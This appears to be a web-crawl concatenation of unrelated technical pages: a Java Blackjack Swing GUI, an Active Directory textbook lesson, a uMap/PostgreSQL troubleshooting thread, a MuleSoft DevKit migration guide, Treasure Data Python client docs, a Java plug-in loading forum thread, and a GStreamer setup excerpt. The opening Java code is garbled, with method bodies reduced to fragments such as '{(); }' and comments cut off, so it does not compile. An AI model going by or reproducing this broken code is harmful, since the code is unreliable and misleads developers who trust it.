window.setDefaultCloseOperation( JFrame.EXIT_ON_CLOSE ); window.setVisible(true); } /** * The public static class BlackjackGUI.Applet represents this program * as an applet. The applet's init() method simply sets the content * pane of the applet to be a HighLowGUI. To use the applet on * a web page, use code="BlackjackGUI$Applet.class" as the name of * the class. */ public static class Applet extends JApplet { public void init() { setContentPane( new BlackjackGUI() ); } } /** * The constructor lays out the panel. A CardPanel occupies the CENTER * position of the panel (where CardPanel is a subclass of JPanel that is * defined below). On the bottom is a panel that holds three buttons. * The CardPanel listens for ActionEvents from the buttons and does all * the real work of the program. */ public BlackjackGUI() { setBackground( new Color(130,50,40) ); setLayout( new BorderLayout(3,3) ); CardPanel board = new CardPanel(); add(board, BorderLayout.CENTER); JPanel buttonPanel = new JPanel(); buttonPanel.setBackground( new Color(220,200,180) ); add(buttonPanel, BorderLayout.SOUTH); JButton hitButton = new JButton( "Hit!" ); hitButton.addActionListener(board); buttonPanel.add(hitButton); JButton standButton = new JButton( "Stand!" ); standButton.addActionListener(board); buttonPanel.add(standButton); JButton newGame = new JButton( "New Game" ); newGame.addActionListener(board); buttonPanel.add(newGame); setBorder(BorderFactory.createLineBorder( new Color(130,50,40), 3) ); } // end constructor /** * A nested class that displays the game and does all the work * of keeping track of the state and responding to user events. */ private class CardPanel extends JPanel implements ActionListener {. /** * The constructor creates the fonts and starts the first game. * It also sets a preferred size of 460-by-310 for the panel. * The paintComponent() method assumes that this is in fact the * size of the panel (although it can be a little taller with * no bad effect). */ CardPanel() { setPreferredSize( new Dimension(460,310) ); setBackground( new Color(0,120,0) ); smallFont = new Font("SansSerif", Font.PLAIN, 12); bigFont = new Font("Serif", Font.BOLD, 16); doNewGame(); } /** * Respond when the user clicks on a button by calling the appropriate * method. Note that the buttons are created and listening is set * up in the constructor of the BlackjackPanel class. */ public void actionPerformed(ActionEvent evt) { String command = evt.getActionCommand(); if (command.equals("Hit!")) doHit(); else if (command.equals("Stand!")) doStand(); else if (command.equals("New Game")) doNewGame(); } /** *. */ void doHit() {(); } /** * This method is called when the user clicks the "Stand!" button. * Check whether a game is actually in progress. If it is, the game * ends. The dealer takes cards until either the dealer has 5 cards * or more than 16 points. Then the winner of the game is determined. */ void doStand() {(); } /** * Called by the constructor, and called by actionPerformed() if the * user clicks the "New Game" button. Start a new game. Deal two cards * to each player. The game might end right then if one of the players * had blackjack. Otherwise, gameInProgress is set to true and the game * begins. */ void doNew(); /** * The paint method shows the message at the bottom of the * canvas, and it draws all of the dealt cards spread out * across the canvas. */ public void paintComponent(Graphics g) { super.paintComponent(g); // fill with background color. g.setFont(bigFont); g.setColor(Color.GREEN); g.drawString(message, 10, getHeight() -(); /** * Draws a card as a 80 by 100 rectangle with upper left corner at (x,y). * The card is drawn in the graphics context g. If card is null, then * a face-down card is drawn. (The cards are rather primitive!) */ void drawCard(Graphics g, Card card, int x, int y) { nested class CardPanel } // end class BlackjackGUI
http://math.hws.edu/javanotes/c6/ex9-ans.html
crawl-001
en
refinedweb
Most computers running Windows XP Professional will be clients in a Windows 2000 domain. One of the benefits of joining a Windows 2000 domain is the Active Directory service. It is important to understand the overall purpose of a directory service and the role that Active Directory plays in a Windows 2000 network. In addition, you should know about the key features of Active Directory, which have been designed to provide flexibility and ease of administration. Active Directory is the directory service included in the Windows 2000 Server products. A directory service is a network service that identifies all resources on a network and makes them accessible to users and applications. Active Directory includes the directory or data store, which is a structured database that stores information about network resources, as well as all the services that make the information available and useful. The resources stored in the directory, such as user data, printers, servers, databases, groups, computers, and security policies, are known as objects. Active Directory organizes resources hierarchically in domains, which are logical groupings of servers and other network resources under a single domain name. The domain is the basic unit of replication and security in a Windows 2000 network. Each domain includes one or more domain controllers. A domain controller is a computer running one of the Windows 2000 Server products that stores a complete replica of the domain directory. To simplify administration, all domain controllers in the domain are peers. You can make changes to any domain controller, and the updates are replicated to all other domain controllers in the domain. Active Directory further simplifies administration by providing a single point of administration for all objects on the network. Because Active Directory provides a single logon point for all network resources, an administrator can log on to one computer and administer objects on any computer in the network. In Active Directory, the directory stores information by organizing itself into sections that permit storage for a very large number of objects. As a result, the directory can expand as an organization grows, allowing you to scale from a small installation with a few hundred objects to a very large installation with millions of objects. Active Directory integrates the Internet concept of a namespace with the Windows 2000 directory services. This allows you to unify and manage the multiple namespaces that now exist in the heterogeneous software and hardware environments of corporate networks. Active Directory uses DNS for its name system and can exchange information with any application or directory that uses Lightweight Directory Access Protocol (LDAP) or Hypertext Transfer Protocol (HTTP). Because Active Directory uses DNS as its domain naming and location service, Windows 2000 domain names are also DNS names. Windows 2000 Server uses Dynamic DNS (DDNS), which enables clients with dynamically assigned addresses to register directly with a server running the DNS Service and update the DNS table dynamically. DDNS eliminates the need for other Internet naming services, such as Windows Internet Naming Service (WINS), in a homogeneous environment. Active Directory further embraces Internet standards by directly supporting LDAP and HTTP. LDAP is an Internet standard for accessing directory services, developed as a simpler alternative to the Directory Access Protocol (DAP). For more information about LDAP, use your Web browser to search for "RFC 1777" and retrieve the text of this RFC. Active Directory supports both LDAP version 2 and version 3. HTTP is the standard protocol for displaying pages on the World Wide Web. You can display every object in Active Directory as a Hypertext Markup Language (HTML) page in a Web browser. Thus, users receive the benefit of the familiar Web browsing model when querying and viewing objects in Active Directory. Active Directory supports several common name formats. Consequently, users and applications can access Active Directory by using the format with which they are most familiar. Table 5.3 describes some standard name formats supported by Active Directory. Table 5.3??Standard Name Formats Supported by Active Directory Here are some questions to help you determine whether you have learned enough to move on to the next lesson. If you have difficulty answering these questions, review the material in this lesson before beginning the next lesson. The answers are in Appendix A, "Questions and Answers."
http://etutorials.org/Microsoft+Products/microsoft+windows+xp+professional+training+kit/Chapter+5+-+Using+the+DNS+Service+and+Active+Directory+Service/Lesson+4nbspUnderstanding+Active+Directory/
crawl-001
en
refinedweb
I try to install umap on an alwaysdata server. I follow this tutorial : At the migrate step umap migrate i have this error: File "/home/*******/umap/lib/python3.6/site-packages/django/db/backends/base/base.py", line 171, in connect self.connection = self.get_new_connection(conn_params) File "/home/*******/umap/lib/python3.6/site-packages/django/db/backends/postgresql/base.py", line 176, in get_new_connection connection = Database.connect(**conn_params) File "/home/*******/umap/lib/python3.6/site-packages/psycopg2/__init__.py", line 164, in connect conn = _connect(dsn, connection_factory=connection_factory, async=async) django.db.utils.OperationalError: could not connect to server: No such file or directory Is the server running locally and accepting connections on Unix domain socket "/var/run/postgresql/.s.PGSQL.5432"? This is my local.py (i have try lot of things for the host: SECRET_KEY = '********' INTERNAL_IPS = ('127.0.0.1', ) ALLOWED_HOSTS = ['*', 'postgresql-<accountname>.alwaysdata.net',] DEBUG = True ADMINS = ( ('You', 'your@email'), ) MANAGERS = ADMINS DATABASES = { 'default': { 'ENGINE': 'django.contrib.gis.db.backends.postgis', 'NAME': '********_umap', 'USER': '********', 'PASSWORD': '********' 'HOST': 'postgresql-<accountname>.alwaysdata.net', 'PORT': '5432', 'DATABASE_HOST' = 'postgresql-<accountname>.alwaysdata.net', } } The alwaysdata team haven't find a solution for my problem. Have you any idea? Thanks a lot. asked 04 Apr '17, 10:37 Suryavarman 11●1●1●2 accept rate: 0% edited 04 Apr '17, 23:39 aseerel4c26 ♦ 32.2k●16●239●552 The last three lines of the error message are pretty clear, aren' they? It's expecting to connect to Postgres via a named pipe at /var/run/postgresql/.s.PGSQL.5432, but that file doesn't exist. Does anything named similarly exist in /var/run/postgresql/? Can you see the server running when you type "ps aux | grep postgres"? It looks like umap (which I don't have a clue about, sorry) is actually supposed to use an IP socket to connect but somehow the database adapter is forced to only try the Unix socket. Maybe psycopg2 has some kind of config file? answered 05 Apr '17, 15:22 mbethke 336●5●10●13 accept rate: 66% Thanks a lot for your answer. I'm sorry for the delay. The folder /var/run/postgresql/ doesn't exist. "ps aux | grep postgres" return nothing I haven't find any psycopg2 config file. From psycopg2/__init_.py def connect(dsn=None, database=None, user=None, password=None, host=None, port=None, connection_factory=None, cursor_factory=None, async=False, **kwargs): the inputs values are: user : None password : None database : **** # not the good one host : None I have force the values inside this init.py file: The output error is : django.db.utils.OperationalError: could not translate host name "postgresql−****.alwaysdata.net" to address: Name or service not known answered 21 Apr '17, 15:14 edited 21 Apr '17, 15:17 meta: please login and then use the "add new comment" button below mbethke's answer if you are commenting on it. Afterwards please delete this "answer". always data have solve my last bug: postgresql−*.alwaysdata.net has to be ( "−" -> "-" ) postgresql-*.alwaysdata.net answered 22 Apr '17, 10:21 Once you sign in you will be able to subscribe for any updates here Answers Answers and Comments Markdown Basics learn more about Markdown This is the support site for OpenStreetMap. Question tags: umap ×203 postgresql ×152 installation ×55 local.py ×1 migrate ×1 question asked: 04 Apr '17, 10:37 question was seen: 4,178 times last updated: 22 Apr '17, 10:21 Error while installing Nominatim Nominatim Install Problem, Final Step. PHP? ./utils/setup.php: No such file or directory initial data problem installing uMap locally and problem saving POIs (probably connected) How to install OpenStreetMap for working offline [closed] How can I extract some LINESTRING consisted of 3 or more POINTs to several LINESTRINGs each by 2 POINTs in PostGIS Speeding up OpenStreetMap PostGIS querying Nominatim installation Problem Error while following osmosis import to database examples Installing OSM (main objective is reverse geocoding) on windows 2008 server First time here? Check out the FAQ!
https://help.openstreetmap.org/questions/55468/umap-installation-postgresql-connection-error
CC-MAIN-2020-29
en
refinedweb
Connector Migration Guide - DevKit 3.6 to 3.7 July 8, 2015 Migrating from DevKit 3.6 to 3.7 The sections that follow list DevKit changes between versions 3.6.n and 3.7.0. New Connector Functional Testing Framework The goal of this new framework is twofold. In the first place, it eases the test development phase by decoupling Mule flows with the test logic itself: no flow references are now defined within flows and therefore a notion of Mule flows is not required from the test developer side. In the second place, it now allows connector tests to run in different Mule versions, either locally or in CloudHub in an automatic manner. As a result, we can now test connector code against multiple Mule versions, assuring backward-compatibility, forward-compatibility, and library-compatibility. Old Mule Connector Test For DevKit 3.6.n and Previous Versions Consider the following when running a test with the old test framework. Let’s consider an example with the Salesforce connector test suite. Extend from ConnectorTestCase. This class brings up methods such initializeTestRunMessage, runFlowAndGetPayload, or upsertOnTestRunMessage. These methods let you load test data through Spring beans, run a flow, get the resulting payload, and add data to a common test data container, respectively. package org.mule.modules.salesforce.automation.testcases; import org.mule.modules.tests.ConnectorTestCase; public abstract class AbstractTestCase extends ConnectorTestCase { } Load test data and set up the test context by loading test data through initializeTestRunMessage(springName), running a particular flow by means of runFlowAndGetPayload(flowName), and keeping the resulting value with upsertOnTestRunMessage(key,value). These methods require a Spring bean definition file, normally called automationSpringBeans.xml and a Mule application flows file, normally called automation-test-flows.xml. package org.mule.modules.salesforce.automation.testcases; ... public class AbortJobTestCases extends AbstractTestCase { @Before public void setUp() throws Exception { initializeTestRunMessage("abortJobTestData"); JobInfo jobInfo = runFlowAndGetPayload("create-job"); upsertOnTestRunMessage("jobId", jobInfo.getId()); } ... Execute the test, where different flows can be called by means of runFlowAndGetPayload(flowName), runFlowAndExpectProperty(flowName, propertyName, expectedObject), or runFlowWithPayloadAndExpect(flowName, expectedObject, payload), among other available methods. @Category({RegressionTests.class}) @Test public void testAbortJob() { try { JobInfo jobInfo = runFlowAndGetPayload("abort-job"); assertEquals(com.sforce.async.JobStateEnum.Aborted, jobInfo.getState()); assertEquals(getTestRunMessageValue("jobId").toString(), jobInfo.getId()); assertEquals(getTestRunMessageValue("concurrencyMode").toString(),jobInfo.getConcurrencyMode().toString()); assertEquals(getTestRunMessageValue("operation").toString(),jobInfo.getOperation().toString()); assertEquals(getTestRunMessageValue("contentType").toString(), jobInfo.getContentType().toString()); } catch (Exception e) { fail(ConnectorTestUtils.getStackTrace(e)); } } } Take-Away From the Pre-3.7 Test Framework The following is how a normal test looks like with the pre-3.7 test framework, where we can observe two things. On the one hand, we have the test data in a Spring bean file, which normally looks like this: <beans xmlns="" ...> <context:property-placeholder <util:map <entry key="type" value="Account" /> <entry key="concurrencyMode" value="Parallel" /> <entry key="contentType" value="XML" /> <entry key="externalIdFieldName" value="Id" /> <entry key="operation" value="insert" /> </util:map> </beans> This Spring file gathers all test data used through out the entire test execution phase. On the other hand, we have a* Mule application flows* file, which looks like this: <mule xmlns=""...> <context:property-placeholder <sfdc:config <sfdc:create-job</sfdc:create-job> </flow> <flow name="abort-job" doc: <sfdc:abort-job </sfdc:abort-job> </flow> This Mule application flows file defines the way a Salesforce operation (keeping in mind we are working with Salesforce as an example) is executed. A flow defines a particular operation to be carried out, a name, the connector configuration to be used and every parameter for that particular operation. A Mule application is formed by flows, which are define in one (or many) Mule application flows file. Therefore, in order to run a test (or a battery of tests), define a Spring bean file along with a flow files, mostly disaggregating test data, methods to be run and the logic of the test itself. It becomes virtually impossible to understand a test by simple reading a test class without either the Spring file or the flows file. The goal of the new connector test framework is to make a test self-contained, decoupling the test from Mule flows and Spring beans. You should have a minimum understanding of how Mule runs, keeping the test data within the test itself (or closed enough). The next section introduces the new connector test framework along with its features. We additionally show different use cases, including features such as pagination or Mule DataSense. Migration Guideline to the New Framework Migration from the previous Mule Connector Test approach to this new framework has been carefully thought and as a result we have easy-to-follow migration guidelines. Iterative Migration We strongly advise connector developers to move current connector tests to a legacy package. For example, if you currently have a package named org.mule.modules.connector.automation.testcases, rename it to org.mule.modules.connector.automation.testcases.legacy. Then create a package org.mule.modules.connector.automation.testcases, as before. This newly created package now contains every migrated test. Test resources are likely to be used within the migrated tests and therefore we advise to leave these resources as they are, normally within src/test/resources. Some tests might not be migrated, either due to framework limitations or to developer choices. If framework limitations or problem arise during migration, inform Mule Support. Take in mind that we currently do not pack the old framework Maven dependency required to run the legacy test suite. Said that, if you maintain the legacy suite is required to manually add the dependency in the pom.xml file. <dependency> <groupId>org.mule.modules</groupId> <artifactId>mule-connector-test</artifactId> <version>2.0.7</version> <scope>test</scope> </dependency> Calling a Connector Method Versus a Mule Flow The major change from Mule Connector Test to this new test framework is how operations are called and executed. Let’s consider the following example. ... initializeTestRunMessage("sampleTestCaseData"); JobInfo jobInfo = runFlowAndGetPayload("create-job"); upsertOnTestRunMessage("jobId", jobInfo.getId()); ... We first need to load the test data by means of a Spring bean, called sampleTestCaseData, defined in an external Spring beans file. Next, we need to run a Mule flow, called create-job, defined as well in an external file. Finally, we need to add to a common data container the recently obtained job identifier for a later use. This require to understand Spring beans, Mule flows and three different methods from ConnectorTestCase to execute a simple create job operation. We have radically changed this approach. We have simplified the way a test developer writes a test by enabling direct access to the operations of a connector. Only special operations, such as paginated ones, require alternative methods. Considering the same example as before, we now have a simplified interface, considering that we already have a connector mockup instance, as follows: ... JobInfo jobInfo = connector.createJob(OperationEnum.insert, "Account", "Id", ContentType.XML, ConcurrencyMode.Parallel); The main characteristic is that the concept of Mule flows disappears and test data is bundled within the test itself. Test Data Management Test data is currently maintained within Spring beans. We encourage to drop support for Spring beans and follow these practices: If test objects are simple (String, Integers, etc.), just add to the test itself as in: JobInfo jobInfo = connector.createJob(OperationEnum.insert, "Account", "Id", ContentType.XML, ConcurrencyMode.Parallel); If test objects are complex such as Domain objects, implement a DataBuilder and use it as follows: List<Map<String, Object>> batchPayload = DataBuilder.createdBatchPayload(); batchInfo = connector.createBatch(jobInfo, batchPayload); Implementing a DataBuilder is mandatory to keep tests consistent. However, the DataBuilder can read the existent Spring beans to load already defined objects or create new ones from scratch following the build pattern . If loading existent Spring beans to build objects, a possible way is using an ApplicationContext as follows inside the data builder class: import ... public class TestDataBuilder { public TestDataBuilder(){ ApplicationContext context = new ClassPathXmlApplicationContext(automationSpringBeans.xml); } public static CustomObjectType createCustomTestData(){ CustomObjectType ret = (CustomObjectType) context.getBean("customObject"); return ret; } public void shutDownDataBuilder(){ ((ConfigurableApplicationContext)context).close(); } } @Configurable Fields Not Supported at @Connector/@Module Class Level In DevKit 3.7.n, @Configurable fields in @Connector and/or @Module classes are no longer encouraged. You should move @Configurable fields to a proper @Config. 3.6.n Connector Example The following shows how the @Connector class was coded in version 3.6.n: @Connector(name="my-connector", friendlyName="MyConnector") public class MyConnector { @Configurable String token; @Config ConnectorConfiguration config; @Processor public String myProcessor(String param) { ... } } 3.7.n Connector Example The following shows how the @C onnector class is now coded in version 3.7.n: @Connector(name="my-connector", friendlyName="MyConnector") public class MyConnector { @Config ConnectorConfiguration config; @Processor public String myProcessor(String param) { ... } } @Configuration(configElementName="config",friendlyName="Configuration") public class ConnectorConfiguration { @Configurable String token; // More Configurable Fields … } Important: If you want to share @Configurable fields between @Config classes, create an abstract class and make all your @Config classes extend that parent element that contains the shared @Configurable fields. @Inject is Not Supported at @Processor Level Mule 3.7 is compliant with the JSR-330 specification. Because of that, the @Inject annotation at @Processor level is invalid. Starting with DevKit 3.7, if the signature method has either MuleEvent or MuleMessage as a parameter, DevKit properly injects the parameter when the processor is called. *Important: * DevKit does not support the JSR-330 specification. 3.6.n Legacy @Inject Example The following shows how @Inject was used in version 3.6.n: @Inject @Processor public boolean parameterInjectionModule(MuleEvent event, MuleMessage message) throws Exception { if(event == null || message == null) { throw new RuntimeException("MuleEvent or MuleMessage cannot be null"); } return true; } 3.7.n @Processor Example With Parameter Injection The following shows how to inject a parameter in version 3.7.n: @Processor public boolean parameterInjectionModule(MuleEvent event, MuleMessage message) throws Exception { if(event == null || message == null) { throw new RuntimeException("MuleEvent or MuleMessage cannot be null"); } return true; }
https://docs.mulesoft.com/release-notes/connector/connector-migration-guide-mule-3.6-to-3.7
CC-MAIN-2020-29
en
refinedweb
We have a new docs home, for this page visit our new documentation site! This article will explain how to use Python bindings for REST API. Prerequisites - Basic knowledge of Arm Treasure Data, including the Toolbelt. - A table with some data. An example is provided in the Getting Started guide. - Basic knowledge of our query language. - Python 3.5+ Installation The Python bindings are released on PyPI as td-client (stands for ‘T’reasure ‘D’ata). You can install the package from pip or easy_install. pip install td-client The source code is available at github. List Databases and Tables The example below lists the databases and tables. The API key is your authentication key. Please refer here to retrieve your API key. import os import tdclient apikey = os.getenv("TD_API_KEY") with tdclient.Client(apikey) as client: for db in client.databases(): for table in db.tables(): print(table.db_name) print(table.table_name) print(table.count) Issue Queries The example below issues a query from a Python program. The query API is asynchronous — you can check for query completion by polling the job periodically (e.g. by issuing job.finished? calls). import os import tdclient apikey = os.getenv("TD_API_KEY") with tdclient.Client(apikey) as client: job = client.query("sample_datasets", "SELECT COUNT(1) FROM www_access") # sleep until job's finish job.wait() for row in job.result(): print(row) If you would like to get result’s schema, you need to call job.result_schema after job finished. List and Get the Status of Jobs The example below lists and gets the status of jobs. import os import tdclient apikey = os.getenv("TD_API_KEY") with tdclient.Client(apikey) as client: # recent 20 jobs len(client.jobs()) # recent 127 jobs of specific status client.jobs(0, 127, "running") client.jobs(0, 127, "success") client.jobs(0, 127, "error") client.jobs(0, 127, "killed") # get job status client.job(job_id) # get job result client.job_result(job_id) Bulk import Status Code 409 Please sign in to leave a comment.
https://support.treasuredata.com/hc/en-us/articles/360001264848-Python-Client
CC-MAIN-2020-29
en
refinedweb
C ExtensionsEdit Extending ruby with C extensions is relatively easy. Here is a tutorial in basic extension creation. Here is the README about converting ruby to c types and vice-versa. Typically a C extension looks like file go.c #include "ruby.h" void Init_go() { } Then you create a makefile for it by using the mkmf library..
http://en.m.wikibooks.org/wiki/Ruby_Programming/C_Extensions
CC-MAIN-2014-10
en
refinedweb
Writing Plug-Ins (Not web) Aaron Roberts Ranch Hand Joined: Sep 10, 2002 Posts: 174 posted Aug 29, 2003 12:05:00 0 I want to write a file editor and provide the ability to use plug-ins. If this were a picture editor then I would want to allow people to write their own plug-in to load new picture formats. Another plug-in example would be winAmp. People can write their own visualizations and just drop them into the specific directory. Any ideas? Best regards, Aaron R> Bear Bibeault Author and ninkuma Marshal Joined: Jan 10, 2002 Posts: 59653 61 I like... posted Aug 29, 2003 15:54:00 0 This is exactly the type of thing interfaces are very good for. You will provide and publish an interface that your code will treat all plug-ins as, and others can write classes that implement that interface. You load the class(es) as an implementation of that interface and the details of the implementation are not important to you. hth, bear [ Asking smart questions ] [ Bear's FrontMan ] [ About Bear ] [ Books by Bear ] Aaron Roberts Ranch Hand Joined: Sep 10, 2002 Posts: 174 posted Aug 29, 2003 16:08:00 0 Thanks for the reply. What I want to do though, is allow people to compile a class which implements my interface and then use it at runtime - ie load the class dynamically. I stumbled across the ClassLoader class. If I understand correctly, I need to implement a custom class loader, which will handle loading classes which implement my interface. IE - PersonalClassLoader implements ClassLoader { .... } public interface CustomFileReader{ public loadFile(File xx) public saveFile(File xx) } The PersonalClassLoader would work with classes which implement the CustomFileReader interface. Can someone tell me if I'm on the right path or not? Regards, Aaron R> PS - Sorry if the pseudo code is goofy. I've been doing C# for the past few months and my syntax-s might be slightly jumbled. [ August 29, 2003: Message edited by: Aaron Roberts ] Ernest Friedman-Hill author and iconoclast Marshal Joined: Jul 08, 2003 Posts: 24165 30 I like... posted Aug 29, 2003 16:20:00 0 You don't necessarily have to write a ClassLoader . The simplest possibility is if you've got the name of the class to load in the String "className" (say somebody typed it in) and the interface is named PlugIn then you can get an instance with just one line of code: PlugIn plugin = (PlugIn) Class.forName(className).newInstance(); [Jess in Action] [AskingGoodQuestions] Aaron Roberts Ranch Hand Joined: Sep 10, 2002 Posts: 174 posted Aug 29, 2003 16:48:00 0 My intent was to have a directory where people would place their plug-in. At run time I would scan the directory and then load each plug-in. If the name of the file was also the name of the class, would I be able to still use the method you mentioned? Can you point me to some pseudo code? Thanks for the input! Its really appreciated! Best regards, Aaron R> Ernest Friedman-Hill author and iconoclast Marshal Joined: Jul 08, 2003 Posts: 24165 30 I like... posted Aug 29, 2003 17:04:00 0 Yes, absolutely, you can do this. In Java, the name of the file is always the name of the class (modulo package names and things.) As far as directory-scanning pseudocode, use java.io.File.list() to get an array of File objects representing the contents of a directory, then use a for-loop to loop over it, and then do whatever you're going to do (strip off the .class extension and use the Class.forName() thing we talked about.) It's really an easy thing to do. The very popular Eclipse IDE has a plug-in architecture, and the way they handle the details of class names and package names, etc, is that a plugin is always a JAR file or a subdirectory, and the plugin always includes a file name plugin.xml, and the XML file specifies what class the IDE should load (as well as other configuration info.) That way a plugin can consist of multiple classes, only one of which implements your interface. Aaron Roberts Ranch Hand Joined: Sep 10, 2002 Posts: 174 posted Sep 20, 2003 18:31:00 0 Just a followup. I was able to get everything working correctly, after a bit of tinkering. I discovered the following things - - If you want the plugins located in another directory, then you have to put the plugin under a package with the same name as the deployment directory. - If you want to have the plugin reside in the same directory as the class which contains the static main method, then just compile the plugin with no package description. Below is some sample code package PluginDemo; import java.io.*; import java.util.*; public class TestPlugins { public static void main(String[] args) { ArrayList classList = new ArrayList(); File dir = new File("./plugins"); File[]files = dir.listFiles(); ArrayListplugins = new ArrayList(); // Remove the .class portion from the file name for(int i = 0; i < files.length; i++) classList.add(files[i].getName().substring(0, files[i].getName().length() - 6)); for(int i = 0; i < classList.size(); i++) { System.out.println("Plugin " + i + " is: " + classList.get(i)); } try{ for(int i = 0; i < classList.size(); i++) plugins.add((IPlugIn)Class.forName("plugins." + classList.get(i).toString()).newInstance()); } catch(Exception ex){ System.out.println("Exception:" + ex); } IPlugIn pi = null; for(int i = 0; i < plugins.size(); i++) { pi = (IPlugIn)plugins.get(i); System.out.println("Plugin says: " + pi.getNumber() + " " + pi.getString()); } } } Below is the interface for the plugins - package PluginDemo; public interface IPlugIn { public int getNumber(); public String getString(); } And lastly here is a sample plugin - package plugins; import PluginDemo.*; public class Plugin1 implements IPlugIn{ public int getNumber() { return 1;// This is the first plugin test } public String getString() { return "I am plugin number 1!"; } } You would place the compiled plugin under the PluginDemo/plugin directory. I hope this helps! Regards, Aaron Stefan Wagner Ranch Hand Joined: Jun 02, 2003 Posts: 1923 I like... posted Sep 22, 2003 17:40:00 0 I wrote an editor with following similarities: User can write their own plugins. They put their plugins in a special subdirectory (plugins/). The app reads all class-Files in this directory, which end with 'Plugin.class' (so their Plugin may invoke other own classes in that directory, which are used by their plugins, without being an own plugin). The plugins are loaded with 'Class.forName (...)'. The editor is MUCH more simple than eclipse. And the plugins are very restricted: They get marked text, may process on this, and give some other text back, so the interface is defined as: public interface PledPlugin { public String doCommand (String in); /* and some helpful methods, to display a menu-entry and create buttons for a toolbar */ public Image getIcon (); public String getCommandName (); } The full project is available at: subject: Writing Plug-Ins (Not web) Similar Threads Quaility UML Tool Eclipse editor plug-in for tomcat Visual Editor for Eclipse Help with understanding reflection All times are in JavaRanch time: GMT-6 in summer, GMT-7 in winter JForum | Paul Wheaton
http://www.coderanch.com/t/371711/java/java/Writing-Plug-Ins-web
CC-MAIN-2014-10
en
refinedweb
Malcolm Wallace wrote: > A: > I've digested this, and I hope can regurgitate the key points for anyone wishing to grasp it quickly. Please correct me if I get anything wrong: - the proposal is to let you specify grafting in the source code - you graft a *sub-hierarchy* of a package anywhere in the global module namespace (the sub-hiearchy bit is new, I haven't seen this proposed before). - you can also graft a sub-hierarchy of a package onto the *current module*, so that it becomes available when importing this module. This is new too. Personally I'm not convinced the extra generality of grafting sub-hierarchies is necessary. The re-export idea is interesting, though. Cheers, Simon
http://www.haskell.org/pipermail/libraries/2006-July/005481.html
CC-MAIN-2014-10
en
refinedweb
Python Multimedia — Save 50% Learn how to develop Multimedia applications using Python with this practical step-by-step guide (For more resources on Python, see here.) So let's get on with it! Installation prerequisites Since we are going to use an external multimedia framework, it is necessary to install the necessary to install the packages mentioned in this section. GStreamer GStreamer is a popular open source multimedia framework that supports audio/video manipulation of a wide range of multimedia formats. It is written in the C programming language and provides bindings for other programming languages including Python. Several open source projects use GStreamer framework to develop their own multimedia application. Throughout this article, we will make use of the GStreamer framework for audio handling. In order to get this working with Python, we need to install both GStreamer and the Python bindings for GStreamer. Windows platform The binary distribution of GStreamer is not provided on the project website. Installing it from the source may require considerable effort on the part of Windows users. Fortunately, GStreamer WinBuilds project provides pre-compiled binary distributions. Here is the URL to the project website: The binary distribution for GStreamer as well as its Python bindings (Python 2.6) are available in the Download area of the website: You need to install two packages. First, the GStreamer and then the Python bindings to the GStreamer. Download and install the GPL distribution of GStreamer available on the GStreamer WinBuilds project website. The name of the GStreamer executable is GStreamerWinBuild-0.10.5.1.exe. The version should be 0.10.5 or higher. By default, this installation will create a folder C:\gstreamer on your machine. The bin directory within this folder contains runtime libraries needed while using GStreamer. Next, install the Python bindings for GStreamer. The binary distribution is available on the same website. Use the executable Pygst-0.10.15.1-Python2.6.exe pertaining to Python 2.6. The version should be 0.10.15 or higher. GStreamer WinBuilds appears to be an independent project. It is based on the OSSBuild developing suite. Visit for more information. It could happen that the GStreamer binary built with Python 2.6 is no longer available on the mentioned website at the time you are reading this book. Therefore, it is advised that you should contact the developer community of OSSBuild. Perhaps they might help you out! Alternatively, you can build GStreamer from source on the Windows platform, using a Linux-like environment for Windows, such as Cygwin (). Under this environment, you can first install dependent software packages such as Python 2.6, gcc compiler, and others. Download the gst-python-0.10.17.2.tar.gz package from the GStreamer website. Then extract this package and install it from sources using the Cygwin environment. The INSTALL file within this package will have installation instructions. Other platforms Many of the Linux distributions provide GStreamer package. You can search for the appropriate gst-python distribution (for Python 2.6) in the package repository. If such a package is not available, install gst-python from the source as discussed in the earlier the Windows platform section. If you are a Mac OS X user, visit. It has detailed instructions on how to download and install the package Py26-gst-python version 0.10.17 (or higher). Mac OS X 10.5.x (Leopard) comes with the Python 2.5 distribution. If you are using packages using this default version of Python, GStreamer Python bindings using Python 2.5 are available on the darwinports website: PyGobject There is a free multiplatform software utility library called 'GLib'. It provides data structures such as hash maps, linked lists, and so on. It also supports the creation of threads. The 'object system' of GLib is called GObject. Here, we need to install the Python bindings for GObject. The Python bindings are available on the PyGTK website at:. Windows platform The binary installer is available on the PyGTK website. The complete URL is:?. Download and install version 2.20 for Python 2.6. Other platforms For Linux, the source tarball is available on the PyGTK website. There could even be binary distribution in the package repository of your Linux operating system. The direct link to the Version 2.21 of PyGObject (source tarball) is: If you are a Mac user and you have Python 2.6 installed, a distribution of PyGObject is available at. Install version 2.14 or later. Summary of installation prerequisites The following table summarizes the packages needed for this article. Testing the installation Ensure that the GStreamer and its Python bindings are properly installed. It is simple to test this. Just start Python from the command line and type the following: >>>import pygst If there is no error, it means the Python bindings are installed properly. Next, type the following: >>>pygst.require("0.10") >>>import gst If this import is successful, we are all set to use GStreamer for processing audios and videos! If import gst fails, it will probably complain that it is unable to work some required DLL/shared object. In this case, check your environment variables and make sure that the PATH variable has the correct path to the gstreamer/bin directory. The following lines of code in a Python interpreter show the typical location of the pygst and gst modules on the Windows platform. >>> import pygst >>> pygst <module 'pygst' from 'C:\Python26\lib\site-packages\pygst.pyc'> >>> pygst.require('0.10') >>> import gst >>> gst <module 'gst' from 'C:\Python26\lib\site-packages\gst-0.10\gst\__init__.pyc'> Next, test if PyGObject is successfully installed. Start the Python interpreter and try importing the gobject module. >>import gobject If this works, we are all set to proceed! A primer on GStreamer In this article,. For further reading, you are recommended to visit the GStreamer project website: gst-inspect and gst-launch We will start by learning the two important GStreamer commands. GStreamer can be run from the command line, by calling gst-launch-0.10.exe (on Windows) or gst-launch-0.10(on other platforms). The following command shows a typical execution of GStreamer on Linux. We will see what a pipeline means in the next sub-section. $gst-launch-0.10 pipeline_description GStreamer has a plugin architecture. It supports a huge number of plugins. To see more details about any plugin in your GStreamer installation, use the command gst-inspect-0.10 (gst-inspect-0.10.exe on Windows). We will use this command quite often. Use of this command is illustrated here. $gst-inspect-0.10 decodebin Here, decodebin is a plugin. Upon execution of the preceding command, it prints detailed information about the plugin decodebin. Elements and pipeline In GStreamer, the data flows in a pipeline. Various elements are connected together forming a pipeline, such that the output of the previous element is the input to the next one. A pipeline can be logically represented as follows: Element1 ! Element2 ! Element3 ! Element4 ! Element5 Here, Element1 through to Element5 are the element objects chained together by the symbol !. Each of the elements performs a specific task. One of the element objects performs the task of reading input data such as an audio or a video. Another element decodes the file read by the first element, whereas another element performs the job of converting this data into some other 